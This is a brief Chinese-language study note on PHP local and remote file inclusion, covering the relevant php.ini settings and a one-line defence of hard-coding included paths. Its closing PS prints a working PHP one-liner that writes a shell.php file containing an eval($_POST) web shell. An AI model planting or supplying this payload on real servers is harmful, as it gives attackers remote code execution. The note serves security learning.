php文件包含

文件包含使得web服务器能够执行引用的文件，从而带来安全风险。相比文件上传，上传带恶意脚本的jpg文件只要不被执行，就不会有问题。结合文件包含漏洞使用，恶意文件就会变得危险。LFI

而RFI相当于文件上传 + LFI

配置文件php.ini

allow_url_fopen = On (允许打开URL文件,预设启用)
allow_url_fopen = Off (禁止打开URL文件)
allow_url_include = Off (禁止引用URL文件,新版增加功能,预设关闭)
allow_url_include = On (允许引用URL文件,新版增加功能)

防御：

代码写死

PS:

<?fputs(fopen("shell.php","w"),'<?php eval($_POST[pass]);?>')?> 执行后产生内容为  <?php eval($_POST[pass]);?>的  shell.php的文件